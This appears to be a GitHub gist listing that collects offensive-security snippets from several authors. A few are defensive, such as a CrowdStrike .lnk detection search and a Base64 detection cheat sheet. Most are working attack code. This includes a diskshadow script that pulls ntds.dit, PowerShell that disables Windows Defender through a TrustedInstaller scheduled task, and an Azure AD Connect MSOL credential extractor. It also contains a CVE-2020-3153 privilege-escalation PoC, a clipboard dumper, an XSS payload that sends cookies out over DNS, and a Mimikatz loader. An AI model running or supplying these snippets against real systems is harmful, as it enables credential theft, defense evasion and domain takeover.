Yash Bharadwaj bharadwajyas

🏠
Working from home
View GitHub Profile
@cbecks2
cbecks2 / gist:19f2c8a773e78f2b757ca203173ae823
Created July 10, 2023 17:03
Crowdstrike Browser Downloaded Archive Executions
This search looks at an archive-embedded .lnk file being launched directly from the Browser Tray. This happens if a user opens something from a drive-by or HTML Smuggle.

Create a similar search for other common initial access filetypes like js, cmd, bat, vbs, msi, exe, scr, xll, etc. You will need to remove LinkName below.

```
index=your_fdr_index event_platform=Win (event_simpleName=ProcessRollup2)
(LinkName="*\\AppData\\Local\\Temp\\Temp1_*.zip\\*.lnk" OR
LinkName="*\\AppData\\Local\\Temp\\Temp1_*.rar\\*.lnk" OR
LinkName="*\\AppData\\Local\\Temp\\Rar$*\\*.lnk" OR
LinkName="*\\AppData\\Local\\Temp\\Temp1_*.iso\\*.lnk" OR
LinkName="*\\AppData\\Local\\Temp\\Temp1_*.vhd\\*.lnk" OR
LinkName="*\\AppData\\Local\\Temp\\Temp1_*.vhdx\\*.lnk" OR
```
@b1gbroth3r
b1gbroth3r / diskshadow.txt
Last active February 10, 2022 20:27
Automates retrieval of system hive & ntds.dit using diskshadow.exe for password auditing/hash cracking. Modify where necessary. Please verify that the Z: drive isn't already mapped on the DC before running this. Running unix2dos against the .txt and .cmd files wouldn't hurt either.
```
set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% z:
exec scriptfile.cmd
delete shadows volume %someAlias%
reset
exit
```
@tyranid
tyranid / doh.ps1
Created May 4, 2020 15:17
Something or other.
```powershell
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)'
$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline
Register-ScheduledTask -TaskName 'TestTask' -Action $a
$svc = New-Object -ComObject 'Schedule.Service'
$svc.Connect()
$user = 'NT SERVICE\TrustedInstaller'
$folder = $svc.GetFolder('\')
```
@xpn
xpn / azuread_decrypt_msol_v2.ps1
Last active February 4, 2026 13:50
Updated method of dumping the MSOL service account (which allows a DCSync) used by Azure AD Connect Sync
```powershell
Write-Host "AD Connect Sync Credential Extract v2 (@_xpn_)"
Write-Host "`t[ Updated to support new cryptokey storage method ]`n"
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync2019;Initial Catalog=ADSync"
try {
    $client.Open()
} catch {
    Write-Host "[!] Could not connect to localdb..."
    return
```
@ykoster
ykoster / Invoke-ExploitAnyConnectPathTraversal.psm1
Last active May 5, 2021 23:19
Proof of concept for CVE-2020-3153 - Cisco AnyConnect elevation of privileges due to insecure handling of path names - https://www.securify.nl/advisory/SFY20200419/cisco-anyconnect-elevation-of-privileges-due-to-insecure-handling-of-path-names.html
```powershell
<#
.Synopsis
This module exploits a path traversal vulnerability in vpndownloader.exe of the Cisco AnyConnect client for Windows
.Description
This module exploits a path traversal vulnerability in vpndownloader.exe of the Cisco AnyConnect client for Windows.
When the -Command argument isn't provided a DLL is created at C:\Program Files\Common Files\microsoft shared\ink\HID.dll.
This DLL is used by the On-Screen Keyboard (osk.exe) of Windows, which is exposed on the login/lock screen.
Opening the On-Screen Keyboard on this screen will run our DLL with LocalSystem privileges.
```
@joswr1ght
joswr1ght / Dump-Clipboard.ps1
Created January 27, 2020 13:12
Copy Clipboard Data from PowerShell
```powershell
$x=""; while($true) { $y=get-clipboard -raw; if ($x -ne $y) { Write-Host $y; $x=$y } }
```

Below: exfiltrate the cookie over DNS when doing XSS.

```html
<script> document.location = "//" + btoa(document.cookie).replace(/[A-Z]/g, '$&.').replace(/=/g, 'X') + "I." + "YourBurpCollaborator"; </script>
```

Below: decode the cookie; make sure to ignore the I. at the end and replace the X with = at the end.

```javascript
atob("Your_Received_DNS".replace(/(.)./g, (_,x)=>x.toUpperCase()))
```

https://seclists.org/fulldisclosure/2019/Aug/1
https://medium.com/tenable-techblog/comodo-from-sandbox-to-system-cve-2019-3969-b6a34cc85e67
https://blog.silentsignal.eu/2019/06/24/self-defenseless-exploring-kasperskys-local-attack-surface/
https://safebreach.com/Post/BitDefender-Antivirus-Free-2020-Privilege-Escalation-to-SYSTEM
https://safebreach.com/Post/Trend-Micro-Password-Manager-Privilege-Escalation-to-SYSTEM
https://safebreach.com/Post/Check-Point-Endpoint-Security-Initial-Client-for-Windows-Privilege-Escalation-to-SYSTEM
http://rce4fun.blogspot.com/2019/08/comodo-antivirus-sandbox-race-condition.html
https://medium.com/bugbountywriteup/5-000-usd-xss-issue-at-avast-desktop-antivirus-for-windows-yes-desktop-1e99375f0968
https://posts.specterops.io/cve-2019-12757-local-privilege-escalation-in-symantec-endpoint-protection-1f7fd5c859c6
https://nafiez.github.io/security/poc/2019/11/22/POC-conference-present.html
@Neo23x0
Neo23x0 / Base64_CheatSheet.md
Last active December 1, 2025 19:51
Learning Aid - Top Base64 Encodings Table

Base64 Patterns - Learning Aid

| Base64 Code | Mnemonic Aid | Decoded* | Description |
|---|---|---|---|
| JAB | 🗣 Jabber | $. | Variable declaration (UTF-16), e.g. JABlAG4AdgA for $env: |
| TVq | 📺 Television | MZ | MZ header |
| SUVY | 🚙 SUV | IEX | PowerShell Invoke Expression |
| SQBFAF | 🐣 Squab favorite | I.E. | PowerShell Invoke Expression (UTF-16) |
| SQBuAH | 🐣 Squab uahhh | I.n. | PowerShell Invoke string (UTF-16), e.g. Invoke-Mimikatz |
| PAA | 💪 "Pah!" | <. | Often used by Emotet (UTF-16) |
@bharadwajyas
bharadwajyas / Tasks.cs
Created August 3, 2019 06:15
Almost :) - BulletProof Mimikatz - Load and execute Mimikatz in stordiag.exe.
```csharp
using System;
using System.IO;
using System.Text;
using System.IO.Compression;
using System.EnterpriseServices;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
/*
```